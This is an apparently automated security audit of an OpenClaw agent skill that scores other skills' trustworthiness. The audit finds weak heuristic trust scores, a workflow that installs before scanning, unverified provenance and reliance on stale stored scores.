Skill Security Scanner
ReviewAudited by ClawScan on May 10, 2026.
Overview
The skill does not show exfiltration or destructive code, but its scan workflow and trust scores can create unsafe confidence and should be reviewed before relying on it.
This appears to be a low-impact local helper rather than malware, but do not treat its trust score as proof that another skill is safe. Scan untrusted skills from a sandboxed or downloaded copy before installing them, and manually review all files, install steps, permissions, and provenance.
Findings (5)
Artifact-based informational review of SKILL.md, metadata, install specs, static scan signals, and capability signals. ClawScan does not execute the skill or run runtime probes.
A malicious or risky skill could receive an overly reassuring score, causing a user or agent to trust it more than warranted.
The script bases safety output on checks of the target SKILL.md and even treats a path substring as evidence of being an official skill, then can tell the user the skill is safe to use.
SKILL_FILE="$SKILL_PATH/SKILL.md" ... GREEN_FLAGS+=("Official OpenClaw skill") ... echo " Safe to use - well documented, standard permissions"Treat results as a rough heuristic only. Do not rely on the trust score alone; review the full manifest, all code files, install steps, permissions, and provenance in a sandbox before installation.
Users may add an untrusted skill to their OpenClaw environment before reviewing it, which undermines the scanner’s stated safety purpose.
The documented workflow says it is scanning before install, but the first command installs the untrusted skill before the scan is run.
# Scan before installing from ClawHub clawhub install cool-new-skill ./scripts/scan-skill.sh ~/.openclaw/skills/cool-new-skill
Use a download-only, temporary, or sandboxed copy for scanning before installing or enabling the skill in the active agent environment.
This is expected for a local scanner, but it still means the user is running shell code from the skill package.
The skill includes a user-invoked shell helper that runs local grep-based checks against a user-provided path.
#!/bin/bash SKILL_PATH="$1" ... grep -qE ... "$SKILL_FILE"
Inspect the script before running it and invoke it only on intended local skill directories.
Users have less provenance information to confirm that the package matches the intended upstream project.
The registry metadata does not provide a verified source or homepage, while the README separately references a GitHub repository.
Source: unknown Homepage: none
Verify the package source, owner, and checksums or repository history before trusting updates.
Stored trust scores can become stale or be over-trusted in future decisions.
The skill recommends persisting scan reports and trust scores for later reuse.
Save to .learnings/ for documentation ... Use memory - Remember trust scores for known skills
Store scan results with dates and evidence, and re-scan or manually review before using old trust decisions.